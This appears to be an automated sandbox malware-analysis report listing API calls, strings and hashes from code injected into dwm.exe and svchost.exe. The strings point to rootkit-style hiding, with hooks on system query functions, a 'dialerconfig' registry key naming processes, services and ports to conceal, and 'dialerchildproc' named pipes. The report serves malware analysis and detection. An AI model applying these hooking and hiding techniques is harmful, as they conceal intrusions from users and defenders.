GetProcessHeap.KERNEL32 ref: 00000158709D12A3
HeapAlloc.KERNEL32 ref: 00000158709D12B4

Memory Dump Source

Source File: 00000017.00000002.2691061633.00000158709D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000158709D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_158709d0000_svchost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: c28a327e80012aa0a233f74c9237465530d9d6b6bff2c160f9e8f97ef2e044da
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 53E0ED76611A00C6E7049F66DC1839976E1FBCDF52F59C028C9490B360DF7D88AACB50

Analysis Process: dwm.exePID: 984, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	94.4%
Signature Coverage:	0%
Total number of Nodes:	107
Total number of Limit Nodes:	16

Executed Functions

Function 0000026DB15C1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000026DB15C165B
HeapAlloc.KERNEL32 ref: 0000026DB15C166A

Part of subcall function 0000026DB15C1274: GetProcessHeap.KERNEL32 ref: 0000026DB15C127A
Part of subcall function 0000026DB15C1274: HeapAlloc.KERNEL32 ref: 0000026DB15C1289
Part of subcall function 0000026DB15C1274: GetProcessHeap.KERNEL32 ref: 0000026DB15C12A3
Part of subcall function 0000026DB15C1274: HeapAlloc.KERNEL32 ref: 0000026DB15C12B4

RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C16DA
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1707
RegCloseKey.ADVAPI32 ref: 0000026DB15C1721
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1741
RegCloseKey.ADVAPI32 ref: 0000026DB15C175C
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C177C
RegCloseKey.ADVAPI32 ref: 0000026DB15C1797
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17B7
RegCloseKey.ADVAPI32 ref: 0000026DB15C17D2
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17F2
RegCloseKey.ADVAPI32 ref: 0000026DB15C180D
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C182D
RegCloseKey.ADVAPI32 ref: 0000026DB15C1848
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1868
RegCloseKey.ADVAPI32 ref: 0000026DB15C1883
RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C18A3
RegCloseKey.ADVAPI32 ref: 0000026DB15C18BE
RegCloseKey.ADVAPI32 ref: 0000026DB15C18C8

Part of subcall function 0000026DB15C12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000026DB15C1326
Part of subcall function 0000026DB15C12C8: GetProcessHeap.KERNEL32 ref: 0000026DB15C1334
Part of subcall function 0000026DB15C12C8: HeapAlloc.KERNEL32 ref: 0000026DB15C1345
Part of subcall function 0000026DB15C12C8: RegEnumValueW.ADVAPI32 ref: 0000026DB15C13A1
Part of subcall function 0000026DB15C12C8: GetProcessHeap.KERNEL32 ref: 0000026DB15C13E9
Part of subcall function 0000026DB15C12C8: HeapAlloc.KERNEL32 ref: 0000026DB15C13F7
Part of subcall function 0000026DB15C12C8: GetProcessHeap.KERNEL32 ref: 0000026DB15C141B
Part of subcall function 0000026DB15C12C8: HeapFree.KERNEL32 ref: 0000026DB15C1429
Part of subcall function 0000026DB15C12C8: lstrlenW.KERNEL32 ref: 0000026DB15C1432
Part of subcall function 0000026DB15C12C8: GetProcessHeap.KERNEL32 ref: 0000026DB15C1440
Part of subcall function 0000026DB15C12C8: HeapAlloc.KERNEL32 ref: 0000026DB15C144E

Strings

paths, xrefs: 0000026DB15C17B0
pid, xrefs: 0000026DB15C173A
udp, xrefs: 0000026DB15C189C
tcp_remote, xrefs: 0000026DB15C1861
process_names, xrefs: 0000026DB15C1775
tcp_local, xrefs: 0000026DB15C1826
service_names, xrefs: 0000026DB15C17EB
startup, xrefs: 0000026DB15C16FD
SOFTWARE\dialerconfig, xrefs: 0000026DB15C16BA

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 87c83e2915f8249e18b336f407c21b775241cdec14b1ae9ec4ad32d63c3a8eb2
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: BE713C76B10A98C6EB509F66EC98AA927F4F784B8CF025111DE4D57B2CEF3AC544C344

Function 0000026DB15C5C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026DB15C5C4B
GetThreadContext.KERNEL32 ref: 0000026DB15C5DB5

Part of subcall function 0000026DB15C5A40: GetCurrentThreadId.KERNEL32 ref: 0000026DB15C5A44

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction ID: 80fde9d1640f6b1750ca6396175daa9841ad995cc5c5f47da6c99ea39dc0c8ce
Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
Instruction Fuzzy Hash: 23D1BE76718B8885DA70DF5AE89436A77F0F389B88F114212EA8D47BA9CF7DC541CB04

Function 0000026DB15C51B0 Relevance: 7.8, APIs: 5, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026DB15C5236

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction ID: c1179633908476b99d54f3692733b4bbaca5f682c3a3586a2f2c9ff0b4d11fa9
Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
Instruction Fuzzy Hash: 1D02C432719B8486E7608F55E89876AB7F0F3C5B88F114115EA8E87BA8DF7DC484CB04

Function 0000026DB15C3878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 0000026DB15C3886
GetCurrentProcess.KERNEL32 ref: 0000026DB15C38B4
VirtualProtectEx.KERNEL32 ref: 0000026DB15C38D6
GetCurrentProcess.KERNEL32 ref: 0000026DB15C38F4
VirtualProtectEx.KERNEL32 ref: 0000026DB15C3915

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 605158ddde55cdb62b079d66bdf7a2781fb26b3c74eba03cc46eafb0d332cb73
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: CA115235B05B8982FB949F62F8087BA66F0F744B88F054065DE8907758EF3EC645C708

Function 0000026DB15C3AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 0000026DB15C3B46
VirtualAlloc.KERNEL32 ref: 0000026DB15C3B80

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: 9e7846c2521f109a6f659ed3fc26864c08ecc25d5a75a4cba48512a367658751
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 0431B131B1DA8C81EA709E15E85836A62F4F38478CF110525A5CD46BACDF7EC6548B08

Function 0000026DB15C3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000026DB15C347A
PathFindFileNameW.SHLWAPI ref: 0000026DB15C3489

Part of subcall function 0000026DB15C3930: StrCmpNIW.SHLWAPI ref: 0000026DB15C3948

Part of subcall function 0000026DB15C3878: GetModuleHandleW.KERNEL32 ref: 0000026DB15C3886
Part of subcall function 0000026DB15C3878: GetCurrentProcess.KERNEL32 ref: 0000026DB15C38B4
Part of subcall function 0000026DB15C3878: VirtualProtectEx.KERNEL32 ref: 0000026DB15C38D6
Part of subcall function 0000026DB15C3878: GetCurrentProcess.KERNEL32 ref: 0000026DB15C38F4
Part of subcall function 0000026DB15C3878: VirtualProtectEx.KERNEL32 ref: 0000026DB15C3915

CreateThread.KERNEL32 ref: 0000026DB15C34D7

Part of subcall function 0000026DB15C1EB4: GetCurrentThread.KERNEL32 ref: 0000026DB15C1EBF

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: aed99abd7715bdc8bb8c86b58ea50799c9fad67165679f88d8eeda714491b6ee
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 68115E78F1864D81F7A19F22FD8EB75A2F0A75870CF4640259906851ECEF3BC288874C

Function 0000026DB15C4ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0000026DB15C4ED4
VirtualProtect.KERNEL32 ref: 0000026DB15C4F17
FlushInstructionCache.KERNEL32 ref: 0000026DB15C4F2C

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction ID: 20a1bfbad8c4c13832f06a0afd573a8530230a5d89607e5c26a7025e083b3273
Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
Instruction Fuzzy Hash: 35F01D76B18A4881D630DF05E84976A67F4E3887D8F154111B98D07BADCE3AC2818F04

Function 0000026DB1592908 Relevance: 3.2, APIs: 2, Instructions: 186
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000026DB15929AA
LoadLibraryA.KERNELBASE ref: 0000026DB1592A31

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 9918a829e56c3c314990f3a7eca28bd584177b04c7289041ca44f1b57f6a9e83
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: B4611332B0125987EA68CF15D85877CB3F2FB04BD8F168025DA1907789DB3AE852C70A

Function 0000026DB15C1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000026DB15C1650: GetProcessHeap.KERNEL32 ref: 0000026DB15C165B
Part of subcall function 0000026DB15C1650: HeapAlloc.KERNEL32 ref: 0000026DB15C166A
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C16DA
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1707
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1721
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1741
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C175C
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C177C
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1797
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17B7
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C17D2
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C17F2

Sleep.KERNEL32 ref: 0000026DB15C1C43
SleepEx.KERNELBASE ref: 0000026DB15C1C49

Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C180D
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C182D
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1848
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C1868
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C1883
Part of subcall function 0000026DB15C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026DB15C18A3
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C18BE
Part of subcall function 0000026DB15C1650: RegCloseKey.ADVAPI32 ref: 0000026DB15C18C8

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: cacc333e1e9da25418c512471dae44125ad6b8f22e1267be9d4bd16534817dcc
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 15312D75B00A09D1FB50AF37DEC837A13F5AB44BD8F5A4021DE098769EEE26C890C358

Function 0000026DB15F2908 Relevance: 1.4, APIs: 1, Instructions: 186
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0000026DB15F29AA

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 6bc1ca590bee73cfb4dbfeebf7ea37e70500ae367b65946061f84e7fdeb867c2
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 2E6113B2F0125C83EA68CF15D85877DB3E2FB04B98F458021DE5947B89DB3AD852C708

Non-executed Functions

Function 0000026DB15C2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000026DB15C2D80
lstrlenW.KERNEL32 ref: 0000026DB15C2FBA

Part of subcall function 0000026DB15C1A14: OpenProcess.KERNEL32 ref: 0000026DB15C1A3A
Part of subcall function 0000026DB15C1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000026DB15C1A58
Part of subcall function 0000026DB15C1A14: PathFindFileNameW.SHLWAPI ref: 0000026DB15C1A67
Part of subcall function 0000026DB15C1A14: lstrlenW.KERNEL32 ref: 0000026DB15C1A73
Part of subcall function 0000026DB15C1A14: StrCpyW.SHLWAPI ref: 0000026DB15C1A86
Part of subcall function 0000026DB15C1A14: CloseHandle.KERNEL32 ref: 0000026DB15C1A94

GetProcAddress.KERNEL32 ref: 0000026DB15C2D95

Part of subcall function 0000026DB15C1554: StrCmpIW.SHLWAPI ref: 0000026DB15C1585

Part of subcall function 0000026DB15C3930: StrCmpNIW.SHLWAPI ref: 0000026DB15C3948

StrCmpNIW.SHLWAPI ref: 0000026DB15C2DD8
lstrlenW.KERNEL32 ref: 0000026DB15C2F00

Strings

NtQueryObject, xrefs: 0000026DB15C2D8B
\Device\Nsi, xrefs: 0000026DB15C2DCB
ntdll.dll, xrefs: 0000026DB15C2D79

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: cf41c2ea798174bafbe0ab8e0fb45ddfa32491c29c50c0b4dc319edd19605347
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: EFB19F72B10A9D85EBA49F29C8487B963F4F744B88F565016EE0953798DF36CD80C748

Function 0000026DB15C7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000026DB15C7E8C
RtlCaptureContext.NTDLL ref: 0000026DB15C7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000026DB15C7ED3
RtlVirtualUnwind.NTDLL ref: 0000026DB15C7F14
IsDebuggerPresent.KERNEL32 ref: 0000026DB15C7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026DB15C7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000026DB15C7F94

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: c9df99479bdc5a59bf929ff00e2905804cc289a5608fb6890d8407a4387a3456
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 17318D72701B849AEB608F61EC847ED73B4F784748F45442ADA4E47B98EF39C648CB08

Function 0000026DB15CB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000026DB15CB585
RtlLookupFunctionEntry.NTDLL ref: 0000026DB15CB59D
RtlVirtualUnwind.NTDLL ref: 0000026DB15CB5D8
IsDebuggerPresent.KERNEL32 ref: 0000026DB15CB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026DB15CB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000026DB15CB626

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: a70aecc7f73f5432ad6ef5706504d1df030883270d0ee720a7de0405caa02526
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: F1315C76704B8496DB60CF25EC447AE73B4F788798F510116EA9D43B98EF39C685CB04

Function 0000026DB15CFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000026DB15CFF67
WriteFile.KERNEL32 ref: 0000026DB15D021E
WriteFile.KERNEL32 ref: 0000026DB15D0270
GetLastError.KERNEL32 ref: 0000026DB15D0372
GetLastError.KERNEL32 ref: 0000026DB15D03D2

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: b62691d81bb7d288a3e40c9db4a203c3aaa6d45fefea2a752f024e8cbccdb530
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: DFE11E32B04AC88AE700CF66D8886EE7BF1F34578CF518116EE4A57B99DE39C51AC704

Function 0000026DB15C12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026DB15C1326
GetProcessHeap.KERNEL32 ref: 0000026DB15C1334
HeapAlloc.KERNEL32 ref: 0000026DB15C1345
RegEnumValueW.ADVAPI32 ref: 0000026DB15C13A1

Part of subcall function 0000026DB15C1554: StrCmpIW.SHLWAPI ref: 0000026DB15C1585

GetProcessHeap.KERNEL32 ref: 0000026DB15C13E9
HeapAlloc.KERNEL32 ref: 0000026DB15C13F7
GetProcessHeap.KERNEL32 ref: 0000026DB15C141B
HeapFree.KERNEL32 ref: 0000026DB15C1429
lstrlenW.KERNEL32 ref: 0000026DB15C1432
GetProcessHeap.KERNEL32 ref: 0000026DB15C1440
HeapAlloc.KERNEL32 ref: 0000026DB15C144E
StrCpyW.SHLWAPI ref: 0000026DB15C1470
GetProcessHeap.KERNEL32 ref: 0000026DB15C1485
HeapFree.KERNEL32 ref: 0000026DB15C1493

Strings

d, xrefs: 0000026DB15C1365

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 0e21a81b8937915537ed683bfac93295cc0a335c399a6a75fed8fbacfbcc086e
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 895182B2B04B89D3EB54CF62E9887AAB7F1F788B88F058124DA4907B18DF39C155C744

Function 0000026DB15C1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000026DB15C1EBF

Part of subcall function 0000026DB15C2174: GetModuleHandleA.KERNEL32 ref: 0000026DB15C218C
Part of subcall function 0000026DB15C2174: GetProcAddress.KERNEL32 ref: 0000026DB15C219D

Part of subcall function 0000026DB15C5C10: GetCurrentThreadId.KERNEL32 ref: 0000026DB15C5C4B

Strings

NtDeviceIoControlFile, xrefs: 0000026DB15C1FF6
EnumServicesStatusExW, xrefs: 0000026DB15C1FB1, 0000026DB15C1FD2
NtQueryDirectoryFile, xrefs: 0000026DB15C1F1F
NtEnumerateKey, xrefs: 0000026DB15C1F59
EnumServiceGroupW, xrefs: 0000026DB15C1F90
NtEnumerateValueKey, xrefs: 0000026DB15C1F76
advapi32.dll, xrefs: 0000026DB15C1F97, 0000026DB15C1FB8
sechost.dll, xrefs: 0000026DB15C1FD9
ntdll.dll, xrefs: 0000026DB15C1ECD
NtResumeThread, xrefs: 0000026DB15C1F02
NtQueryDirectoryFileEx, xrefs: 0000026DB15C1F3C
NtQuerySystemInformation, xrefs: 0000026DB15C1EE5

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: ce399990c72d9467439a05634a8f08f1dae0e2b665e31c63d02aceababf8b6ca
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 8B31A978F1198EA0EB04DFAAEC59AF523B1F78474CFC3552395191217D9FBA8289C348

Function 0000026DB15C23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000026DB15C2405
GetCurrentProcessId.KERNEL32 ref: 0000026DB15C240F

Part of subcall function 0000026DB15C19AC: OpenProcess.KERNEL32 ref: 0000026DB15C19CA
Part of subcall function 0000026DB15C19AC: IsWow64Process.KERNEL32 ref: 0000026DB15C19E0
Part of subcall function 0000026DB15C19AC: CloseHandle.KERNEL32 ref: 0000026DB15C19FB

CreateFileW.KERNEL32 ref: 0000026DB15C2468
WriteFile.KERNEL32 ref: 0000026DB15C2490
ReadFile.KERNEL32 ref: 0000026DB15C24AF
CloseHandle.KERNEL32 ref: 0000026DB15C24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000026DB15C243F
\\.\pipe\dialerchildproc64, xrefs: 0000026DB15C2438

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
